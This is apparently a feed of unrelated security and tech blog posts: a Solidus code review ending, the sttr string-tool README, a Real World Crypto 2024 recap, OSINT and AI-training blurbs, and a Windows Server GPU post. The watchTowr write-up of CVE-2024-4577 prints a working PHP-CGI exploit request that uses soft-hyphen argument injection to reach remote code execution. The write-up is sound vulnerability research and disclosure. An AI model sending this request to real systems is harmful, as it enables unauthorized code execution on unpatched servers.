For this, I found the Solidus Print Invoice plugin, which has not been maintained for 2 years. You might think that this is a good sign from an attacker’s point of view, except that in reality the plugin is not designed to work with Solidus 4, so the first step was to make it compatible so that it could be installed …

As indicated in the documentation, this plugin only adds PDF generation on the admin side.

To cut a long story short, this plugin didn’t give me anything new, and I spent more time installing it than I did understanding that I wouldn’t get any vulnerabilities from it.

I haven’t had a look at it, but it’s interesting to note that other plugins such as Solidus Friendly Promotions, according to its documentation, replace Solidus cores features and are therefore inherently more likely to introduce a vulnerability.

Conclusion

Presenting all the tests that can and have been carried out is also far too time-consuming. Code analysis really is time-consuming, so to claim that I’ve been exhaustive and analyzed the whole application would be false but, after spending a few days on Solidus, I think it’s a very interesting project from a security point of view.

Of course, I’d have liked to have been able to detail a few vulnerabilities, but this blog post tends to show that you can’t always be fruitful.


Solidus — Code Review was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Sttr - Cross-Platform, Cli App To Perform Various Operations On String


sttr is command line software that allows you to quickly run various transformation operations on the string.


// With input prompt
sttr

// Direct input
sttr md5 "Hello World"

// File input
sttr md5 file.text
sttr base64-encode image.jpg

// Reading from different processor like cat, curl, printf etc..
echo "Hello World" | sttr md5
cat file.txt | sttr md5

// Writing output to a file
sttr yaml-json file.yaml > file-output.json

:movie_camera: Demo

:battery: Installation

Quick install

You can run the below curl to install it somewhere in your PATH for easy use. Ideally it will be installed at ./bin folder

curl -sfL https://raw.githubusercontent.com/abhimanyu003/sttr/main/install.sh | sh

Webi

MacOS / Linux

curl -sS https://webi.sh/sttr | sh

Windows

curl.exe https://webi.ms/sttr | powershell

See here

Homebrew

If you are on macOS and using Homebrew, you can install sttr with the following:

brew tap abhimanyu003/sttr
brew install sttr

Snap

sudo snap install sttr

Arch Linux

yay -S sttr-bin

Scoop

scoop bucket add sttr https://github.com/abhimanyu003/scoop-bucket.git
scoop install sttr

Go

go install github.com/abhimanyu003/sttr@latest

Manually

Download the pre-compiled binaries from the Release! page and copy them to the desired location.

:books: Guide

  • After installation simply run sttr command.
// For interactive menu
sttr
// Provide your input
// Press two enter to open operation menu
// Press `/` to filter various operations.
// Can also press UP-Down arrows select various operations.
  • Working with help.
sttr -h

// Example
sttr zeropad -h
sttr md5 -h
  • Working with files input.
sttr {command-name} {filename}

sttr base64-encode image.jpg
sttr md5 file.txt
sttr md-html Readme.md
  • Writing output to file.
sttr yaml-json file.yaml > file-output.json
  • Taking input from other command.
curl https: //jsonplaceholder.typicode.com/users | sttr json-yaml
  • Chaining the different processor.
sttr md5 hello | sttr base64-encode

echo "Hello World" | sttr base64-encode | sttr md5

:boom: Supported Operations

Encode/Decode

  • [x] ascii85-encode - Encode your text to ascii85
  • [x] ascii85-decode - Decode your ascii85 text
  • [x] base32-decode - Decode your base32 text
  • [x] base32-encode - Encode your text to base32
  • [x] base64-decode - Decode your base64 text
  • [x] base64-encode - Encode your text to base64
  • [x] base85-encode - Encode your text to base85
  • [x] base85-decode - Decode your base85 text
  • [x] base64url-decode - Decode your base64 url
  • [x] base64url-encode - Encode your text to url
  • [x] html-decode - Unescape your HTML
  • [x] html-encode - Escape your HTML
  • [x] rot13-encode - Encode your text to ROT13
  • [x] url-decode - Decode URL entities
  • [x] url-encode - Encode URL entities

Hash

  • [x] bcrypt - Get the Bcrypt hash of your text
  • [x] md5 - Get the MD5 checksum of your text
  • [x] sha1 - Get the SHA1 checksum of your text
  • [x] sha256 - Get the SHA256 checksum of your text
  • [x] sha512 - Get the SHA512 checksum of your text

String

  • [x] camel - Transform your text to CamelCase
  • [x] kebab - Transform your text to kebab-case
  • [x] lower - Transform your text to lower case
  • [x] reverse - Reverse Text ( txeT esreveR )
  • [x] slug - Transform your text to slug-case
  • [x] snake - Transform your text to snake_case
  • [x] title - Transform your text to Title Case
  • [x] upper - Transform your text to UPPER CASE

Lines

  • [x] count-lines - Count the number of lines in your text
  • [x] reverse-lines - Reverse lines
  • [x] shuffle-lines - Shuffle lines randomly
  • [x] sort-lines - Sort lines alphabetically
  • [x] unique-lines - Get unique lines from list

Spaces

  • [x] remove-spaces - Remove all spaces + new lines
  • [x] remove-newlines - Remove all new lines

Count

  • [x] count-chars - Find the length of your text (including spaces)
  • [x] count-lines - Count the number of lines in your text
  • [x] count-words - Count the number of words in your text

RGB/Hex

  • [x] hex-rgb - Convert a #hex-color code to RGB
  • [x] hex-encode - Encode your text Hex
  • [x] hex-decode - Convert Hexadecimal to String

JSON

  • [x] json - Format your text as JSON
  • [x] json-escape - JSON Escape
  • [x] json-unescape - JSON Unescape
  • [x] json-yaml - Convert JSON to YAML text
  • [x] json-msgpack - Convert JSON to MSGPACK
  • [x] msgpack-json - Convert MSGPACK to JSON

YAML

  • [x] yaml-json - Convert YAML to JSON text

Markdown

  • [x] markdown-html - Convert Markdown to HTML

Extract

  • [x] extract-emails - Extract emails from given text
  • [x] extract-ip - Extract IPv4 and IPv6 from your text
  • [x] extract-urls - Extract URls your text ( we don't do ping check )

Other

  • [x] escape-quotes - escape single and double quotes from your text
  • [x] completion - generate the autocompletion script for the specified shell
  • [x] interactive - Use sttr in interactive mode
  • [x] version - Print the version of sttr
  • [x] zeropad - Pad a number with zeros
  • [x] and adding more....

Featured On

These are the few locations where sttr was highlighted, many thanks to all of you. Please feel free to add any blogs/videos you may have made that discuss sttr to the list.



Real World Cryptography Conference 2024

7 June 2024 at 16:00

This year’s Real World Cryptography Conference recently took place in Toronto, Canada. As usual, this conference organized by the IACR showcased recent academic results and industry perspectives on current cryptography topics over three days of presentations. A number of co-located events also took place before and after the conference, including the FHE.org Conference, the Real World Post-Quantum Cryptography (RWPQC) Workshop and the High Assurance Crypto Software (HACS) Workshop.

A number of NCC Group’s Cryptography Services team members attended the conference and several of the workshops this year. Some of our favorite talks and takeaways are summarized in this post.

Post-Quantum Cryptography

At this year’s Real World Cryptography conference, post-quantum cryptography was strongly represented. With two PQC sessions during the main conference itself, as well as the co-located RWPQC event which took place on the Sunday before the main conference, it was exciting to see so much engagement on the PQC front during our trip to Toronto!

Following the blueprint from last year’s event, the RWPQC workshop opened with an update about the NIST PQC competitions, which re-iterated the current status of the NIST PQC competition, and NIST’s goal of producing the final standards for NIST FIPS 203 and 204 drafts within the next few months, followed by an initial draft for the Falcon specification, under the name FN-DSA. This was followed by updates from other standardization bodies including ETSI, BSI, NSCS, and the IETF, which are all working towards providing PQC guidance in their respective areas of influence with the final FIPS drafts expected soon. MITRE and the Linux Foundation PQC migration consortiums both also gave updates during the workshop. As part of these talks, many standards bodies discussed their approach to the migration and whether or not they plan to mandate the use of hybrid algorithms, with approaches varying from required hybridization to less strong mandates on this front. Additionally, a number of the talks noted that while the use of hybrid algorithms may be helpful in the short term, the community should start considering eventual plans to migrate to a single set of algorithms post-hybridization, citing concerns about increased complexity or combinatorial expansion of algorithms as new algorithms get introduced in the future.

As a counterpart to the presentations by standardization bodies, the RWPQC program included real-world updates about the progress of the PQC migration at various companies, including Signal, Amazon, Google, Meta, and evolutionQ. All talks provided valuable insights as to the challenges, both already overcome and those that are yet to come, for migrating to PQC in their respective settings. Finally, a few more academic talks on lattice cryptanalysis and implementation footguns rounded off the program. We’ll do a slightly deeper dive for some of our favorite talks!

Lattice Cryptanalysis Talks

Martin Albrecht and John Schanck presented two complementary discussions on topics in lattice cryptanalysis. In the first presentation, Martin Albrecht did a deep dive into the analysis of the current best known attack for lattice cryptosystems, known as the dual attack, starting with a brief history of the primal and dual attacks, and noting some recent works that questioned the accuracy of some common heuristics, resulting in improved analyses for these dual algorithms. Martin also noted that there doesn’t seem to be a clear reason why the dual attacks appear to perform better than the primal attacks, noting that “it seems morally wrong that the dual attack would beat the primal attack”, since it introduces additional transformations over the direct approaches. Finally, the presentation concluded with a discussion of recent lattice attacks leveraging machine learning models, noting that in his opinion there is currently no reason to believe that ML can threaten lattice cryptosystems.

John Schanck’s following talk focused on the “real cost” of the best-known attacks. The NIST security levels I, III and V aim to guide protocol designers to select parameters which offer guarantees of security matching the cost of the best-known attacks against AES-128, 192 and 256 respectively. However, unlike attacks on AES, the dual-lattice attack has an incredibly expensive and memory-hungry sieving step. To make progress on an attack against Kyber and related schemes, one must perform a huge amount of computation before any progress is made on reducing the key-space (compare this to attacking AES where you can simply immediately just start guessing keys). The talk featured fun comparisons — a Moon’s weight of silicon would be needed to fabricate enough memory for the naive implementation of the dual-attack — and really demonstrated how challenging it is to align the real cost of attacking different cryptographic protocols when the attacks themselves are structured so differently at the algorithmic level. The take home message from Schanck’s talk was that when memory cost is taken into account, Kyber 768 should be enough for everyone.

Implementation Footguns for Post-Quantum Cryptography

Nadia Heninger presented a very detailed discussion about potential pitfalls she foresees as issues for post-quantum implementations, primarily based on her experiences with implementations of classical cryptography. She noted that many common classes of implementation pitfalls in classical cryptography are still applicable in PQC settings, including RNG issues, issues with sampling or uniformity of distributions (which may be even trickier in the PQC settings, as many lattice schemes require sampling from multiple distributions), API misuse, and missing validation checks, which can be tricky to enforce via tests. This talk resonated with us, as we have already started seeing some of these issues in the post-quantum projects that we have reviewed so far. Finally, her discussion noted that the increased implementation complexity for PQC schemes may be a blessing in disguise, as the more complicated an algorithm seems, the less likely people are to try to implement it themselves, and instead rely on existing implementations, which may end up helping avoid many of these potential issues at scale!

Making Signal Messenger Post Quantum / Making Encrypted Messaging Post Quantum

Rolfe Schmidt gave a fantastic talk on the upgrade to Signal messenger to begin the inclusion of post-quantum cryptography into the key-agreement stage of the protocol, now known as PQXDH. The talk motivated this change as a protection against “harvest-now, decrypt later” attacks with a design philosophy to change only what strictly needs to be changed to achieve protection against a quantum adversary. Although the key-agreement now includes a hybridized protocol using post-quantum algorithms, the Ratcheting algorithm is still classical only and so the classical guarantees of the Signal protocol are still not quite aligned with the post-quantum guarantees. Ensuring the ratchet is post-quantum secure is a work in progress of the Signal team, where they’re hoping to ensure that the performance of the messaging is not affected by the inclusion of Kyber into the ratcheting mechanism. The design documentation is now available PQXDH Specification

Additionally to the design and implementation of PQXDH, Signal collaborated with academia to produce a formally verified implementation of PQXDH using both ProVerif and CryptoVerif. Signal explained that through the process of formally verifying the protocol, they not only gained confidence in the changes, but verification also highlighted parts of the specification which had been under-described and could have led to attacks if misinterpreted. The process then not only added support for the validity of the design but acted as a guide for a robust description of PQXDH for developers in the future.

Conclusion

Overall, it’s very exciting to be seeing so much movement in the post-quantum real-world applications. We are looking forwards to future PQC updates at RWC, RWPQC and elsewhere, and to reviewing PQC projects that come our way!

– Giacomo Pope and Elena Bakos Lang

Key and Certificate Transparency

Key and certificate transparency was a hot topic at this year’s conference. The Levchin Prize was awarded to the team at Google responsible for “creating and deploying Certificate Transparency at scale”. In addition to the public recognition of what that work has pioneered, three talks were scheduled about different aspects of modern transparency solutions.

Invited talk: Key transparency: introduction, recent results, and open problems

The first talk by Melissa Chase from Microsoft Research delved into recent results and open problems in Key Transparency. In modern encrypted messaging deployments, a service provider is generally responsible for distributing users’ public keys. However, what if a man-in-the-middle attacker were to intercept (and meddle with) the public key of the recipient that a sender is trying to establish a secure communication with? Or worse, what if the server were to get compromised? In an end-to-end encrypted messaging setting, key transparency aims to solve this problem of trusted public key distribution which is often glossed over in academic works.

Until recently, the industry solution to the key transparency question was some form of out-of-band verification, in which users can display a fingerprint corresponding to the chat’s encryption key and compare it with one another. Subsequent deployments have made comparing these traditionally long numerical codes easier by displaying a QR code that can be verified when both users are physically close to each other. These solutions can be slightly tedious for users and the industry has started to deploy large-scale and automatic key transparency solutions based on relatively recent academic works such as CONIKS.

In some of these modern key transparency deployments, service providers provide a publicly accessible key directory which keeps track of users’ public keys. Users can then ensure that the key they hold for a given contact is consistent with the key tracked in the latest version of the online key directory. However, granting people access to public key repositories needs to be done while still maintaining user privacy. Indeed, the deployment of such systems should not make it easier for anyone to be able to track individual users’ actions, for example by figuring out when they refresh their keys (if they get a new device for instance) or by allowing attackers to find out which users are participating in the system by identifying personal information (such as phone numbers or email addresses) in the key directory.

In order to realize the goals outlined above, key transparency deployments make use of a few interesting cryptographic primitives. Service providers generally publish key directory together with a commitment to that directory. In practice, this is usually achieved with a Sparse Merkle Tree, and the commitment is the root of that Merkle Tree. In early academic proposals, the server would post a commitment to the current key directory at regular intervals. New developments (such as SEEMless) are proposing for the server to publish commitments to the incremental changes to the key directory, making the effort to audit the key transparency tree computationally lower (since the entire tree does not have to be recomputed and verified). To safeguard the privacy of users, modern key transparency deployments use Verifiable Random Functions (VRFs), which can be thought of as the public key variant of a hash function. In a VRF, only the private key owner may compute the hash output and its associated proof, but anyone can use the associated public key to verify that the output was calculated correctly. If the leaves of the Merkle tree were computed from the identifying information of users, for example by simply hashing some form of identifier, attackers could easily collect information about users. Using a VRF construction allows to conceal that information, by essentially randomizing the leaf positions in the Merkle tree. Melissa finished rounding up the literature review portion of her talk by presenting OPTIKS, a performant new key transparency solution which focuses on scalability, and which Melissa contributed to.

While many of the technical aspects of key transparency seem to be well ironed-out in theory, there are still a number of open questions and practical aspects that require further engineering efforts. To start, how to effectively instantiate the bulletin board, that publicly accessible key directory that should be efficiently and consistently accessed by users? A second crucial and often overlooked point is that of auditors. One common goal of these key transparency deployments is to provide the ability for auditors to validate the consistency of the key directory. But who are these auditors in practice, and what incentives do they have for performing costly validation work? And if they were to identify any wrongdoing, who would they even report such issues to? A third open question Melissa raised was around the security guarantees of such systems and whether stronger security notions could be obtained. For example, in current schemes, users will detect if a service provider maliciously replaces a user’s key but users themselves can’t prevent it.

WhatsApp Key Transparency

Later that day, Kevin Lewi and Sean Lawlor presented WhatsApp’s Key Transparency solution. Recent updates to WhatsApp added a feature to automatically validate users’ public keys based on a key transparency deployment following many of the concepts presented above. Previously, out-of-band verification used to be available to chat users, but automatic public key verification was recently added. Now, servers publish a commitment to the public key database, and, supported by UI updates in the app, the validity of a contact’s key is automatically checked when users access the “Encryption” menu of their contacts.

The presentation explored the different technical aspects this deployment necessitated, such as the infrastructure challenges to support these updates as well as the frequency at which they need to be updated. The speakers then presented some of the underlying cryptographic constructions used by the deployment. The system uses Sparse Merkle trees and VRFs in a fashion similar to SEEMless, and publishes incremental updates to the key transparency tree in the form of append-only proofs which are about ~200 MB each and are published at approximately 5 minutes intervals.

Kevin and Sean concluded their presentation by advertising the release of their implementation of the auditable key directory (accessible at https://github.com/facebook/akd), which is what WhatsApp uses in production for their key transparency deployment and which can also be used to verify the consistency proofs by external auditors. Members of NCC Group’s Cryptography Services team reviewed the implementation a few months before the conference; the public report can be found on NCC’s research platform: Public Report – WhatsApp Auditable Key Directory (AKD) Implementation Review.

Modern transparency logs

Finally, on the last day of the conference, Filippo Valsorda gave a talk on Modern Transparency Logs. Drawing parallels with key transparency solutions, Filippo kicked off his talk by framing transparency logs as a reusable primitive; a magic global append-only list of entries essentially defined by three fundamental questions: what are the entries, who can add them, and who monitors these entries? Different transparency solutions (such as the Go checksum database which Filippo used repeatedly as example throughout his presentation) are ultimately defined by the answers to these questions.

When building transparency logs solutions, a fundamental type of attacks that must be prevented is the ability to present different views of the system logs to different users, which is known as a split view attack. In a key transparency deployment for example, one could imagine a compromised (or rogue) server advertising a different public key for a target victim. There are a few solutions to circumvent split view attacks. A first one is to ensure local consistency (for example with an append-only log), a second measure is peer-to-peer gossip, where peers communicate amongst themselves to ensure they are being served the same system view, and finally, a third measure is witness cosigning. Witnesses are lightweight, third-party entities responsible for verifying consistency proofs between consecutive Merkle tree roots, and which will cosign that new tree head. Given a network of witnesses, more complex policies can be developed such as requiring a threshold of M-out-of-N signers in order for the tree head to be considered validated.

Filippo then proceeded to advertise a number of specifications and work-in-progress items to support modern transparency logs deployments. The first one being the checkpoint format specification, which is used to interoperate with the witness ecosystem. Checkpoints are essentially signed notes precisely formatted for use in transparency log applications, and which contain the origin of the checkpoint, the tree size and the root hash, and a number of potential co-signatures on that root hash. Recognizing that a checkpoint coupled with an inclusion proof is everything a client needs to verify an inclusion proof offline, Filippo then introduced the concept of “spicy signatures” (🌶️) which are offline verifiable proof of inclusion in a transparency log. He then concluded his talk by presenting a lightweight CLI tool and showing how spicy signatures can be used efficiently in existing deployments, for example by bringing transparency to the Debian package ecosystem in only a few hours.

– Paul Bottinelli

Symmetric Encryption

This year’s symmetric encryption session reinforced the motivations for modernizing our security requirements and design philosophy when it comes to symmetric primitives and modes of operation based on lessons learned and changing requirements over the past 20 years.

Building the Next Generation of AEAD

The symmetric cryptography session was opened by Sanketh Menda, who closed out last year’s event with a presentation on “context-committing” AEADs, or authenticated encryption with associated data, which acknowledges the need for standardized constructions that commit the complete “context” of an AEAD (e.g., the key and nonce). In his update this year, “Building the Next Generation of AEAD“, a broader set of goals was presented:

  • We sometimes need a fast approach for lightweight devices;
  • We sometimes need a suitable approach for cloud-scale data;
  • We sometimes need nonce-misuse resistance;
  • We sometimes need a nonce-hiding scheme;
  • And as established last time, we sometimes need context commitment.

And is there one ideal scheme to rule them all? Of course not… However, there may be a new approach to designing a family of schemes that facilitates safer use. To this end, a “flexible AEAD” construction is proposed which presents an implementer with a single set of binary choices corresponding to various security properties, thereby allowing a developer to express their intent, rather than to choose and compose various modes of operation. Sanketh then presents a series of primitives that can be composed in standard ways to achieve these various security goals.

With two excellent back-to-back presentations on the topic, I’m hoping we’ll get to hear a progress update from Sanketh again next year.

What’s wrong with Poly1305?

Jan Gilcher and Jérôme Govinden followed up with a presentation looking back on the development and deployment of Poly1305 and ask a fundamental question: “Given today’s advancements and applications would we still converge to this same design?”. This is initially motivated by observations that Poly1305 sacrifices a degree of security in favor of speed on a 32-bit platform using optimizations in the floating-point unit, whereas most modern platforms are 64-bit and leverage the arithmetic logic unit for optimized Poly1305 computations. So how would we build and optimize a Poly1305-like construction on today’s hardware?

Much like the preceding talk, the authors consider a modular construction for a family of polynomial-based hashes, from which Poly1305 and other similar schemes can be implemented based on a set of input parameters. This allows for the efficient testing and comparison of a broad family of implementations which can be tweaked between favoring security level and speed on a given platform. While such an approach does not outperform a hand-optimized implementation of a specific function, it appears to achieve impressive results based on the flexibility it provides.

Leveraging their new construction, the authors present a variant, Poly1163, which is better optimized for current hardware at a similar security level to Poly1305. Impressively, despite not being hand-optimized at all, this variant outperforms OpenSSL’s Poly1305 implementation. On the other end of the design spectrum, the authors also present Poly1503, which focuses on providing higher bit-security by not clamping inputs in the same manner as Poly1305 without a substantial hit to performance.

I want to encrypt 2^64 bytes with AES-GCM using a single key

Shay Gueron closed out the session with his presentation “I want to encrypt 2^64 bytes with AES-GCM using a single key“, which proposes a new mode of operation for AES called double nonce double key (DNDK), purpose-built to extend AES-GCM to support modern cloud-scale encryption tasks using a single key.

AES-GCM is the most widely used AEAD we encounter and is generally a safe choice for most applications when used correctly. However, GCM has a few well-known limitations: The 12 byte initialization value (IV) limits the number of invocations that can be made with a single key, and GCM out of the box does not provide key commitment, meaning that an attacker can produce a single authenticated ciphertext that decrypts to two different messages under two different nonce+key combinations. It is precisely these two problems that DNDK addresses, while striving to remain as close as possible to the GCM construction itself.

In practice, the concept is simple: If the short IV (nonce) is holding us back, then simply make it bigger, say, double its size. But a “double nonce” isn’t quite enough with GCM, since the first internal step is to hash it down to its original smaller size. Instead, we can use AES itself to build a key derivation function that takes as input the “double nonce” and the encryption key and derives an invocation-specific encryption key. In short, we use our double-nonce-derived-key to encrypt our message, and we have DNDK. And as a bonus, DNDK supports key commitment out of the box as well, as an optional output parameter. This incurs little practical overhead and does not rely on any additional cryptographic primitives to achieve its security.

Shay and friends at Meta have provided an optimized open-source implementation of DNDK-GCM, alongside implementations of AES-GCM and AES-GCM-SIV for comparison. A draft RFC has also been published to guide those wishing to implement DNDK for themselves. The Crypto Services team is proud to have supported the development of the DNDK draft RFC, with team members Gérald Doussot, Thomas Pornin, and Eric Schorn being formally acknowledged in the draft RFC.

– Kevin Henry

Real World Cryptography 2025

We look forward to catching up with everyone next year in Sofia, Bulgaria!

Announcing AI/ML safety and security trainings

7 June 2024 at 13:00

By Michael D. Brown

We are offering AI/ML safety and security training in summer and fall of this year!

Recent advances in AI/ML technologies opened up a new world of possibilities for businesses to run more efficiently and offer better services and products. However, incorporating AI/ML into computing systems brings new and unique complexities, risks, and attack surfaces. In our experience helping clients safely and securely deploy these systems, we’ve discovered that their security teams have knowledge gaps at this intersection of AI/ML and systems security. We’ve developed our training to help organizations close this gap and equip their teams with the tools to secure their AI/ML operations pipelines and technology stacks.

What you will learn in our training

Our course is tailored for security engineers, ML engineers, and IT staff who need to understand the unique challenges of securing AI/ML systems deployed on conventional computing infrastructure. Over two days, we provide a comprehensive understanding of Al safety and security that goes beyond basic knowledge to practical and actionable insights into these technologies’ specific dangers and risks. Here’s what you will learn through a blend of instructional training and hands-on case studies:

  1. Fundamentals of AI/ML and cybersecurity: In this module, you will learn how AI/ML models/techniques work, what they can and cannot do, and their limitations. We also cover some essential information and software security topics that may be new for ML engineers.
  2. AI/ML tech stacks and operations pipelines: In our second module, you will learn how AI/ML models are selected, configured, trained, packaged, deployed, and decommissioned. We’ll also explore the everyday technologies in the AI/ML stack that professionals use for these tasks.
  3. Vulnerabilities and remediation: In this module, you will learn about the unique attack surfaces and vulnerabilities present in deployed AI/ML systems. You’ll also learn methods for preventing and/or remediating AI/ML vulnerabilities.
  4. Risk assessment and threat modeling: The fourth module covers practical techniques for conducting comprehensive risk assessments and threat models for AI/ML systems. Our holistic approaches will help you evaluate the safety and security risks AI/ML systems may pose to end users in deployed contexts.
  5. Mitigations, controls, and risk reduction: Finally, you will learn how to implement realistic risk mitigation strategies and practical security controls for AI/ML systems. Our comprehensive strategies address the entire AI/ML ops pipeline and lifecycle.

Equip your team to work at the intersection of security and AI/ML

Trail of Bits combines cutting-edge research with practical, real-world experience to advance the state of the art in AI/ML assurance. Our experts are here to help you confidently take your business to the next level with AI/ML technologies. Please contact us today to schedule an on-site (or virtual) training for your team. Individuals interested in this training can also use this form to be notified in the future when we offer public registration for this course!

PIP-INTEL - OSINT and Cyber Intelligence Tool

 


Pip-Intel is a powerful tool designed for OSINT (Open Source Intelligence) and cyber intelligence gathering activities. It consolidates various open-source tools into a single user-friendly interface simplifying the data collection and analysis processes for researchers and cybersecurity professionals.

Pip-Intel utilizes Python-written pip packages to gather information from various data points. This tool is equipped with the capability to collect detailed information through email addresses, phone numbers, IP addresses, and social media accounts. It offers a wide range of functionalities including email-based OSINT operations, phone number-based inquiries, geolocating IP addresses, social media and user analyses, and even dark web searches.




No Way, PHP Strikes Again! (CVE-2024-4577)

7 June 2024 at 08:09
No Way, PHP Strikes Again! (CVE-2024-4577)

Orange Tsai tweeted a few hours ago about “One of [his] PHP vulnerabilities, which affects XAMPP by default”, and we were curious to say the least. XAMPP is a very popular way for administrators and developers to rapidly deploy Apache, PHP, and a bunch of other tools, and any bug that could give us RCE in its default installation sounds pretty tantalizing.

Fortunately, for defenders, the bug has only been exploited on Windows-based PHP installations (where PHP is specifically used in CGI mode), under some specific locales:

  • Chinese (both simplified and traditional), and
  • Japanese.

However, Orange cautions that other locales could be affected too, and urges users to upgrade to the latest version of PHP, which fixes these bugs (for detail, see their blogpost).

We are keen to point out that we are unsure how common this configuration, or deployment type, is in reality. It is also not our job to find out, outside of our client base. But, regardless, it's an interesting vulnerability due to the root cause. Enjoy with us.

Orange's blogpost, while informative, doesn’t tell us exactly what to do to get that sweet RCE. Unfortunately, the wide range of configuration options makes it difficult to conclusively prove an instance to be vulnerable (or not) at a passive glance and, obviously, because a Windows machine's 'locale' is not typically externally fingerprintable. Because of this, we set about reproducing the bug—if we can exploit it, that’s the best way of proving exploitability, right?

Reading Orange's blog, it is clear that the bug only affects CGI mode of PHP. In this mode, the webserver parses HTTP requests and passes them to a PHP script, which then performs some processing on them. For example, querystrings are parsed and passed to the PHP interpreter on the command line - a request such as as http://host/cgi.php?foo=bar might be executed as php.exe cgi.php foo=bar, for example.

This does, of course, introduce an avenue for command injection, which is why input is carefully handled and sanitized before calling php.exe (cough CVE-2012-1823). However, it seems there is a corner-case which the developers did not account for, which allows an attacker to break out of the command line and supply arguments that are interpreted by PHP itself. This corner-case relates to how unicode characters are converted into ASCII. This is best explained with an example.

Here are two invocations of php.exe, one malicious and one benign. Can you spot the difference?

No Way, PHP Strikes Again! (CVE-2024-4577)

No, neither can I. Let’s look at then in a hex editor and see if that give us any clue.

No Way, PHP Strikes Again! (CVE-2024-4577)

Hmm, interesting - here we can see that the first invocation uses a normal dash (0x2D), while the second, it seems, uses something else entirely (a ‘soft hyphen,’ apparently), with the code 0xAD (highlighted). While they both appear the same to you and me, they have vastly different meanings to the OS.

An important detail here is that Apache will escape the actual hyphen - 0x2D - but not the second ‘soft hyphen’, 0xAD. After all, it’s not a real hyphen, right? So there’s no need to escape it… right?

No Way, PHP Strikes Again! (CVE-2024-4577)
We don't care if it's the same joke as above, it's still funny.

Well. It turns out that, as part of unicode processing, PHP will apply what’s known as a ‘best fit’ mapping, and helpfully assume that, when the user entered a soft hyphen, they actually intended to type a real hyphen, and interpret it as such. Herein lies our vulnerability - if we supply a CGI handler with a soft hyphen (0xAD), the CGI handler won’t feel the need to escape it, and will pass it to PHP. PHP, however, will interpret it as if it were a real hyphen, which allows an attacker to sneak extra command line arguments, which begin with hyphens, into the PHP process.

This is remarkably similar to an older PHP bug (when in CGI mode), CVE-2012-1823, and so we can borrow some exploitation techniques developed for this older bug and adapt them to work with our new bug. A helpful writeup advises that, to translate our injection into RCE, we should aim to inject the following arguments:

-d allow_url_include=1 -d auto_prepend_file=php://input

This will accept input from our HTTP request body, and process it using PHP. Straightforward enough - let’s try a version of this equipped with our 0xAD ‘soft hyphen’ instead of the usual hyphen. Maybe it’s enough to slip through the escaping?

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>
 

Oh joy - we’re rewarded with a phpinfo page, showing us we have indeed achieved RCE.

No Way, PHP Strikes Again! (CVE-2024-4577)

Conclusions

A nasty bug with a very simple exploit - perfect for a Friday afternoon.

Fortunately, though, patches are available, so we echo Orange Tsai’s advice to upgrade your PHP installation. As always, fantastic work and a salute to Orange Tsai.

Those running in an affected configuration under one of the affected locales - Chinese (simplified, or traditional) or Japanese - are urged to do this as fast as humanely possible, as the bug has a high chance of being exploited en-mass due to the low exploit complexity. Other users are still strongly encouraged to update:

For Windows running in other locales such as English, Korean, and Western European, due to the wide range of PHP usage scenarios, it is currently not possible to completely enumerate and eliminate all potential exploitation scenarios. Therefore, it is recommended that users conduct a comprehensive asset assessment, verify their usage scenarios, and update PHP to the latest version to ensure security.

We won’t duplicate the advisory here, instead, we advise those individuals seeking remediation advice to refer to the comprehensive advisory.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

It's our job to understand how emerging threats, vulnerabilities, and TTPs affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.

CVE-2024-4577 - Yet Another PHP RCE: Make PHP-CGI Argument Injection Great Again!

6 June 2024 at 22:00
This is a side story/extra bug while I’m preparing for my Black Hat USA presentation. I believe most of the details have already been covered in the official advisory&nbsp;(should be published soon). Although PHP-CGI has gradually been phased out over time, this vulnerability affects XAMPP for Windows by default, allowing unauthenticated attackers to execute arbitrary code on remote XAMPP

Introducing GPU Innovations with Windows Server 2025

Afia Boakye and Rebecca Wambua

 

AI empowers businesses to innovate, streamline operations, and deliver exceptional value.  With the upcoming Windows Server 2025 Datacenter and Azure Stack HCI 24H2 releases, Microsoft is empowering customers to lead their businesses through the AI revolution.

 

Here is what Hari Pulapaka, GM of Windows Server at Microsoft, says about how Windows Server empowers customers with AI: Windows Server 2025 is well positioned to help our customers be part of the AI revolution with its advanced GPU capabilities, allowing our customers to do training, learning, or inferencing using powerful NVIDIA GPUs.

 

GPUs are essential for AI due to their parallel processing capabilities and highly scalable architecture.  Using the upcoming OS releases, Microsoft’s customers can provide an entire GPU to a VM, which can run either Linux or Server, in a failover cluster using discrete device assignment (DDA). This means that mission-critical AI workloads can easily run in a clustered VM and, upon an unexpected fault or a planned move, the VM will restart on another node in the cluster, using a GPU on that node.

 

GPU Partitioning (GPU-P) is a powerful new capability we are adding with Windows Server 2025. GPU-P empowers customers to partition a supported GPU and assign those partitions to different VMs in a failover cluster.  This means that multiple VMs can share a single physical GPU, giving each VM an isolated fraction of the physical GPU's capabilities. 

 

Further, due to a planned or unplanned move, the VMs will restart on different nodes in the cluster, using GPU partitions on those different nodes.  Besides enabling clustered VMs to use GPU-P, the upcoming OS releases are bringing live migration to VMs using GPU-P.  Live migration for GPU-P enables customers to balance mission-critical workloads across their fleet and to conduct hardware maintenance and software upgrades without stopping their VMs.

 

Windows Administration Center (WAC) empowers customers to configure, use, and manage VMs using virtualized GPUs.  WAC enables administrators to manage GPU virtualization for both standalone and failover clusters from a single, centralized location, thereby reducing management complexity.

 

The screenshots below highlight GPU-P management in WAC, demonstrating how users can seamlessly view, configure, and assign GPU partitions to VMs.

 

In this first image, customers can view a comprehensive list of their partitioned GPUs.

 

afiaboakye_0-1717702566240.png

Figure 1: The GPU partitions inventory page

 

Customers can partition eligible GPUs with their desired number of partitions.

afiaboakye_1-1717702566253.png

Figure 2: The partition count configuration page

 

Finally, customers can assign GPU partitions to different VMs.

afiaboakye_2-1717702566259.png

Figure 3:  The GPU partition assignment tool

 

These high-value GPU innovations are a result of Microsoft's and NVIDIA's continual close collaboration.

 

